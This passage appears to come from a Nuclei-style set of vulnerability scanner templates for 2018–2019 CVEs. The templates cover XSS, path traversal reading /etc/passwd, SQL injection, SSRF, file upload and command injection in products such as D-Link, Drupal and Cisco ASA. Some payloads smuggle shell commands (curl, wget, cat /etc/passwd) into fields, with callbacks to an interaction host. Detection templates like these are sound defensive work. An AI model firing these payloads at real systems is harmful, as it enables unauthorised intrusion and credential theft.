Redirect","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/share/page/dologin"],"body":"success=%2Fshare%2Fpage%2F&failure=:\\\\interact.sh&username=baduser&password=badpass\n","headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*:\\s*)(?:https?://|//|\\\\)?(?:[a-zA-Z0-9\\-_]*\\.)?interact\\.sh(?:\\s*)$"]}]}]},{"id":"CVE-2019-19134","info":{"name":"WordPress Hero Maps Premium <=2.2.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/hmapsprem/views/dashboard/index.php?p=/wp-content/plugins/hmapsprem/foo%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["foo\"></script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-12583","info":{"name":"Zyxel ZyWall UAG/USG - Account Creation Access","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/free_time.cgi"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["free_time_redirect.cgi?u=","&smsOnly=0"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-7543","info":{"name":"KindEditor 4.1.11 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/kindeditor/php/demo.php","{{BaseURL}}/php/demo.php"],"body":"content1=</script><script>alert(document.domain)</script>&button=%E6%8F%90%E4%BA%A4%E5%86%85%E5%AE%B9","headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]}]}]},{"id":"CVE-2019-16920","info":{"name":"D-Link Routers - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /apply_sec.cgi HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nReferer: {{BaseURL}}\n\nhtml_response_page=login_pic.asp&login_name=YWRtaW4%3D&log_pass=&action=do_graph_auth&login_n=admin&tmp_log_pass=&graph_code=&session_id=62384\n","POST /apply_sec.cgi HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nReferer: {{BaseURL}}/login_pic.asp\nCookie: uid=1234123\n\nhtml_response_page=login_pic.asp&action=ping_test&ping_ipaddr=127.0.0.1%0a{{url_encode('cat /etc/passwd')}}\n","POST /apply_sec.cgi HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nReferer: {{BaseURL}}/login_pic.asp\nCookie: uid=1234123\n\nhtml_response_page=login_pic.asp&action=ping_test&ping_ipaddr=127.0.0.1%0a{{url_encode('type C:\\\\Windows\\\\win.ini')}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:","\\[(font|extension|file)s\\]"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-17270","info":{"name":"Yachtcontrol Webapplication 1.0 - Remote Command Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/pages/systemcall.php?command=cat%20/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-7719","info":{"name":"Acrolinx Server <5.2.5 - Local File Inclusion","severity":"high"},"requests":[{"raw":["GET /..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini HTTP/1.1\nHost: {{Hostname}}\n\n"],"unsafe":true,"matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"}]}]},{"id":"CVE-2018-19751","info":{"name":"DomainMOD 4.11.01 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_username={{username}}&new_password={{password}}\n","POST /admin/ssl-fields/add.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_field_name=new&new_field_type_id=1&new_description=test&new_notes=test\n","GET /admin/ssl-fields/ HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"><script>alert(document.domain)</script></a>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-1335","info":{"name":"Apache Tika <1.1.8-  Header Command Injection","severity":"high"},"requests":[{"method":"PUT","path":["{{BaseURL}}/meta"],"body":"var oShell = WScript.CreateObject('WScript.Shell');var oExec = oShell.Exec(\"cmd /c whoami\");","headers":{"X-Tika-OCRTesseractPath":"cscript","X-Tika-OCRLanguage":"//E:Jscript","Expect":"100-continue","Content-type":"image/jp2","Connection":"close"},"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["Content-Type: text/csv"]},{"type":"word","part":"body","words":["org.apache.tika.parser.DefaultParser","org.apache.tika.parser.gdal.GDALParse"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-5230","info":{"name":"Atlassian Jira Confluence - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/pages/includes/status-list-mo%3Ciframe%20src%3D%22javascript%3Aalert%28document.domain%29%22%3E.vm"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<iframe src=\"javascript:alert(document.domain)\">","confluence"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-18608","info":{"name":"DedeCMS 5.7 SP2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/plus/feedback.php/rp4hu%27><script>alert%28document.domain%29<%2fscript>?aid=3"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["'><script>alert(document.domain)</script>","DedeCMS Error Warning!"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-20608","info":{"name":"Imcat 4.4 - Phpinfo Configuration","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/imcat/root/tools/adbug/binfo.php?phpinfo1"],"matchers-condition":"and","matchers":[{"type":"word","words":["PHP Extension","PHP Version"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","group":1,"regex":[">PHP Version <\\/td><td class=\"v\">([0-9.]+)"],"part":"body"}]}]},{"id":"CVE-2018-6530","info":{"name":"D-Link - Unauthenticated Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /soap.cgi?service=whatever-control;curl {{interactsh-url}};whatever-invalid-shell HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: identity\nSOAPAction: \"whatever-serviceType#whatever-action\"\nContent-Type: text/xml\n\nwhatever-content\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: curl"]}]}]},{"id":"CVE-2018-17254","info":{"name":"Joomla! JCK Editor SQL Injection","severity":"critical"},"requests":[{"raw":["GET /plugins/editors/jckeditor/plugins/jtreelink/dialogs/links.php?extension=menu&view=menu&parent=\"%20UNION%20SELECT%20NULL,NULL,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION(),md5({{num}})),NULL,NULL,NULL,NULL,NULL--%20aa HTTP/1.1\nHost: {{Hostname}}\nReferer: {{BaseURL}}\n"],"matchers":[{"type":"word","part":"body","words":["{{md5(num)}}"]}]}]},{"id":"CVE-2018-19326","info":{"name":"Zyxel VMG1312-B10D 5.13AAXA.8 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/../../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/octet-stream"]},{"type":"regex","part":"body","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2018-3238","info":{"name":"Oracle Fusion Middleware WebCenter Sites 11.1.1.8.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /cs/Satellite?pagename=OpenMarket/Gator/FlexibleAssets/AssetMaker/complexassetmaker&cs_imagedir=qqq\"><script>alert(document.domain)</script> HTTP/1.1\nHost: {{Hostname}}\n","GET /cs/Satellite?pagename=OpenMarket%2FXcelerate%2FActions%2FSecurity%2FNoXceleditor&WemUI=qqq%27;}%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /cs/Satellite?pagename=OpenMarket%2FXcelerate%2FActions%2FSecurity%2FProcessLoginRequest&WemUI=qqq%27;}%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n"],"stop-at-first-match":true,"matchers-condition":"or","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>/graphics/common/screen/dotclear.gif"]},{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","Variables.cs_imagedir"],"condition":"and"}]}]},{"id":"CVE-2018-3714","info":{"name":"node-srv - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/node_modules/../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-14474","info":{"name":"Orange Forum 1.4.0 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/login?next=http://interact.sh/?app.scan/","{{BaseURL}}/signup?next=http://interact.sh/?app.scan/"],"stop-at-first-match":true,"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2018-11759","info":{"name":"Apache Tomcat JK Connect <=1.2.44 - Manager Access","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/jkstatus","{{BaseURL}}/jkstatus;"],"matchers-condition":"and","matchers":[{"type":"word","words":["JK Status Manager"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-1271","info":{"name":"Spring MVC Framework - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/static/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini","{{BaseURL}}/spring-mvc-showcase/resources/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini"],"matchers-condition":"and","matchers":[{"type":"word","words":["for 16-bit app support"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-16288","info":{"name":"LG SuperSign EZ CMS 2.5 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/signEzUI/playlist/edit/upload/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-18570","info":{"name":"Planon <Live Build 41 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wicket/resource/nl.planon.pssm.dashboard.cre.engine.wicket.page.AbstractDashboardPage/html/nodata.html?nodatamsg=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-20010","info":{"name":"DomainMOD 4.11.01 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_username={{username}}&new_password={{password}}\n","POST /assets/add/ssl-provider-account.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_ssl_provider_id=1&new_owner_id=1&new_email_address=&new_username=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_password=&new_reseller=0&new_reseller_id=&new_notes=\n","GET /assets/ssl-accounts.php HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"host-redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(header_3, \"text/html\")","contains(body_3, \"><script>alert(document.domain)</script></a>\")"],"condition":"and"}]}]},{"id":"CVE-2018-14931","info":{"name":"Polarisft Intellect Core Banking Software Version 9.7.1 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/IntellectMain.jsp?IntellectSystem=https://www.interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2018-14728","info":{"name":"Responsive filemanager 9.13.1 Server-Side Request Forgery","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/filemanager/upload.php"],"body":"fldr=&url=file:///etc/passwd","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2018-14064","info":{"name":"VelotiSmart Wifi - Directory Traversal","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-15517","info":{"name":"D-Link Central WifiManager - Server-Side Request Forgery","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php/System/MailConnect/host/{{interactsh-url}}/port/80/secure/"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2018-10201","info":{"name":"Ncomputing vSPace Pro 10 and 11 - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/.../.../.../.../.../.../.../.../.../windows/win.ini","{{BaseURL}}/...\\...\\...\\...\\...\\...\\...\\...\\...\\windows\\win.ini","{{BaseURL}}/..../..../..../..../..../..../..../..../..../windows/win.ini","{{BaseURL}}/....\\....\\....\\....\\....\\....\\....\\....\\....\\windows\\win.ini"],"stop-at-first-match":true,"matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"}]}]},{"id":"CVE-2018-7422","info":{"name":"WordPress Site Editor <=1.1.1 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=../../../../../../../wp-config.php","{{BaseURL}}/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd"],"matchers-condition":"or","matchers":[{"type":"word","part":"body","words":["DB_NAME","DB_PASSWORD"],"condition":"and"},{"type":"regex","part":"body","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2018-16716","info":{"name":"NCBI ToolBox - Directory Traversal","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/blast/nph-viewgif.cgi?../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-12634","info":{"name":"CirCarLife Scada <4.3 - System Log Exposure","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/html/log"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["CirCarLife Scada"]},{"type":"word","words":["user.debug","user.info","EVSE"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-19877","info":{"name":"Adiscon LogAnalyzer <4.1.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/src/login.php?referer=%22%3E%3Cscript%3Econfirm(document.domain)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["value=\"\"><script>confirm(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-7662","info":{"name":"CouchCMS <= 2.0 - Path Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/includes/mysql2i/mysql2i.func.php","{{BaseURL}}/addons/phpmailer/phpmailer.php"],"stop-at-first-match":true,"matchers-condition":"or","matchers":[{"type":"word","part":"body","words":["mysql2i.func.php on line 10","Fatal error: Cannot redeclare mysql_affected_rows() in"],"condition":"and"},{"type":"word","part":"body","words":["phpmailer.php on line 10","Fatal error: Call to a menber function add_event_listener() on a non-object in"],"condition":"and"}]}]},{"id":"CVE-2018-20009","info":{"name":"DomainMOD 4.11.01 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_username={{username}}&new_password={{password}}\n","POST /assets/add/ssl-provider.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_ssl_provider=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_url=&new_notes=\n","GET /assets/ssl-providers.php HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"host-redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(header_3, \"text/html\")","contains(body_3, \"><script>alert(document.domain)</script></a>\")"],"condition":"and"}]}]},{"id":"CVE-2018-16341","info":{"name":"Nuxeo <10.3 - Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/nuxeo/login.jsp/pwn${31333333330+7}.xhtml"],"matchers":[{"type":"word","part":"body","words":["31333333337"]}]}]},{"id":"CVE-2018-20526","info":{"name":"Roxy Fileman 1.4.5 - Unrestricted File Upload","severity":"critical"},"requests":[{"raw":["POST /php/upload.php HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundary20kgW2hEKYaeF5iP\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.81 Safari/537.36\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}\nAccept-Encoding: gzip, deflate\nAccept-Language: en-GB,en-US;q=0.9,en;q=0.8\n\n------WebKitFormBoundary20kgW2hEKYaeF5iP\nContent-Disposition: form-data; name=\"action\"\n\nupload\n------WebKitFormBoundary20kgW2hEKYaeF5iP\nContent-Disposition: form-data; name=\"method\"\n\najax\n------WebKitFormBoundary20kgW2hEKYaeF5iP\nContent-Disposition: form-data; name=\"d\"\n\n/Uploads\n------WebKitFormBoundary20kgW2hEKYaeF5iP\nContent-Disposition: form-data; name=\"files[]\"; filename=\"{{randstr}}.php7\"\nContent-Type: application/octet-stream\n\n<?php\necho md5('CVE-2018-20526');\n?>\n\n------WebKitFormBoundary20kgW2hEKYaeF5iP--\n","GET /Uploads/{{randstr}}.php7 HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["f76d6a5f7491700cc3a678bdba2902d3"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-19287","info":{"name":"WordPress Ninja Forms <3.3.18 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/edit.php?s&post_status=all&post_type=nf_sub&action=-1&form_id=1&nf_form_filter&begin_date=\"><img+src%3Dx+onerror%3Dalert%28document.domain%29%3B%2F%2F&end_date&filter_action=Filter&paged=1&action2=-1 HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["Begin Date\" value=\"\\\"><img src=x onerror=alert(document.domain);//\">"]},{"type":"word","part":"header_2","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-16167","info":{"name":"LogonTracer <=1.2.0 - Remote Command Injection","severity":"critical"},"requests":[{"raw":["POST /upload HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlogtype=XML&timezone=1%3Bwget+http%3A%2F%2F{{interactsh-url}}%3B\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2018-16671","info":{"name":"CirCarLife <4.3 - Improper Authentication","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/html/device-id"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["CirCarLife Scada"]},{"type":"word","part":"body","words":["circontrol"]},{"type":"regex","part":"body","regex":["(19|20)\\d\\d[- /.](0[1-9]|1[012])[- /.](0[1-9]|[12][0-9]|3[01])"]}]}]},{"id":"CVE-2018-13379","info":{"name":"Fortinet FortiOS - Credentials Disclosure","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession"],"matchers":[{"type":"regex","part":"body","regex":["^var fgt_lang ="]}]}]},{"id":"CVE-2018-6200","info":{"name":"vBulletin - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/redirector.php?url=https://interact.sh","{{BaseURL}}/redirector.php?do=nodelay&url=https://interact.sh"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<meta http-equiv=\"refresh\" content=\"0; URL=https://interact.sh\">"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-5316","info":{"name":"WordPress SagePay Server Gateway for WooCommerce <1.0.9 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/sagepay-server-gateway-for-woocommerce/includes/pages/redirect.php?page=</script>\"><script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script>\"><script>alert(document.domain)</script>","Authenticate your card"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-8719","info":{"name":"WordPress WP Security Audit Log 3.1.1 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/uploads/wp-security-audit-log/failed-logins/"],"matchers-condition":"and","matchers":[{"type":"word","words":["[TXT]",".log","Index of"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-6184","info":{"name":"Zeit Next.js <4.2.3 -  Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/_next/../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-12031","info":{"name":"Eaton Intelligent Power Manager 1.6 - Directory Traversal","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../etc/passwd","{{BaseURL}}/server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../Windows/win.ini"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:","\\[(font|extension|file)s\\]"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-12613","info":{"name":"PhpMyAdmin <4.8.2 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-16836","info":{"name":"Rubedo CMS <=3.4.0 - Directory Traversal","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/theme/default/img/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e//etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-16299","info":{"name":"WordPress Localize My Post 1.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/localize-my-post/ajax/include.php?file=../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-1000226","info":{"name":"Cobbler - Authentication Bypass","severity":"critical"},"requests":[{"raw":["POST {{BaseURL}}/cobbler_api HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/xml\n\n<?xml version='1.0'?>\n<methodCall>\n  <methodName>_CobblerXMLRPCInterface__make_token</methodName>\n  <params>\n    <param>\n      <value>\n        <string>cobbler</string>\n      </value>\n    </param>\n  </params>\n</methodCall>\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["!contains(tolower(body), '<name>faultCode</name>')"]},{"type":"word","part":"header","words":["Content-Type: text/xml"]},{"type":"word","part":"body","words":["<methodResponse>"]},{"type":"regex","part":"body","regex":["(.*[a-zA-Z0-9].+==)</string></value>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-20824","info":{"name":"Atlassian Jira WallboardServlet <7.13.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/plugins/servlet/Wallboard/?dashboardId=10000&dashboardId=10000&cyclePeriod=alert(document.domain)"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["(?mi)timeout:\\salert\\(document\\.domain\\)"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-10956","info":{"name":"IPConfigure Orchid Core VMS 2.0.5 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-0296","info":{"name":"Cisco ASA - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions"],"headers":{"Accept-Encoding":"deflate"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["///sessions"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-7602","info":{"name":"Drupal - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /?q=user%2Flogin HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_id=user_login&name={{username}}&pass={{password}}&op=Log+in\n","GET /?q={{url_encode(\"{{userid}}\")}}%2Fcancel HTTP/1.1\nHost: {{Hostname}}\n","POST /?q={{url_encode(\"{{userid}}\")}}%2Fcancel&destination={{url_encode(\"{{userid}}\")}}%2Fcancel%3Fq%5B%2523post_render%5D%5B%5D%3Dpassthru%26q%5B%2523type%5D%3Dmarkup%26q%5B%2523markup%5D%3Decho+COP-2067-8102-EVC+|+rev HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_id=user_cancel_confirm_form&form_token={{form_token}}&_triggering_element_name=form_id&op=Cancel+account\n","POST /?q=file%2Fajax%2Factions%2Fcancel%2F%23options%2Fpath%2F{{form_build_id}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_build_id={{form_build_id}}\n"],"cookie-reuse":true,"host-redirects":true,"max-redirects":2,"matchers":[{"type":"word","words":["CVE-2018-7602-POC"]}],"extractors":[{"type":"regex","name":"userid","group":1,"regex":["<meta about=\"([/a-z0-9]+)\" property=\"foaf"],"internal":true,"part":"body"},{"type":"regex","name":"form_token","group":1,"regex":["<input type=\"hidden\" name=\"form_token\" value=\"(.*)\" />"],"internal":true,"part":"body"},{"type":"regex","name":"form_build_id","group":1,"regex":["<input type=\"hidden\" name=\"form_build_id\" value=\"(.*)\" />"],"internal":true,"part":"body"}]}]},{"id":"CVE-2018-10822","info":{"name":"D-Link Routers - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/uir//etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-15745","info":{"name":"Argus Surveillance DVR 4.0.0.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/WEBACCOUNT.CGI?OkBtn=++Ok++&RESULTPAGE=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FWindows%2Fsystem.ini&USEREDIRECT=1&WEBACCOUNTID=&WEBACCOUNTPASSWORD="],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["for 16-bit app 